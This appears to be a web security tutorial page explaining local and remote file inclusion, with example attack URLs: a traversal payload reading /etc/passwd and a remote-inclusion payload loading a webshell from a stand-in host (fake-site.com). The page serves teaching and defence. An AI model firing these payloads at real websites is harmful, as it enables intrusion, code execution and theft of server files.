File include

File Inclusion Vulnerabilities: LFI and RFI

File inclusion vulnerabilities allow an attacker to load arbitrary content onto a website by exploiting improper handling of input parameters that specify file paths. These vulnerabilities fall into two main categories:

  1. Local File Inclusion (LFI): Enables an attacker to include local files on the server (e.g., configuration files, sensitive data).

  2. Remote File Inclusion (RFI): Allows an attacker to include files from remote servers, potentially introducing malicious code (e.g., webshells or reverse shells).

Dangerous Outcomes of File Inclusion

  1. Code Execution: Attackers can execute arbitrary code by including malicious files, such as a webshell or reverse shell.

  2. Website Defacement: If an attacker uploads a malicious file to the server and includes it, the website's content can be modified.

  3. Directory Listing: Attackers can gain unauthorized access to sensitive server directories and files, exposing confidential information.

Example of a Vulnerable URL

https://example-site.com/?module=module.php

The module parameter specifies a file to include. If not properly validated, this can be exploited.

Exploitation Examples

1. Local File Inclusion (LFI)

An attacker exploits directory traversal to read sensitive server files. Example:

https://example-site.com/?module=../../../etc/passwd%00

This includes the /etc/passwd file (a sensitive system file) by navigating up the directory structure using ../.

2. Remote File Inclusion (RFI)

An attacker includes a malicious file hosted on a remote server to execute arbitrary code. Example:

https://example-site.com/?module=https://fake-site.com/webshell.php%00

This includes a malicious webshell.php file, which could allow the attacker to execute commands on the server.

Key Difference: Directory Traversal vs. File Inclusion

Aspect

Directory Traversal

File Inclusion

Purpose

Access files by navigating directories (e.g., ../../)

Includes the file in the server’s response.

Result

Reads sensitive files.

May result in code execution or website defacement.

Additional Risks

N/A

Can enable SSRF with RFI.

  • Directory Traversal enables access to restricted files without including them in the web server’s response.

  • File Inclusion directly integrates the specified file’s content into the server's response, which can lead to execution of malicious code.

PreviousOpen redirectNextFile upload

Last updated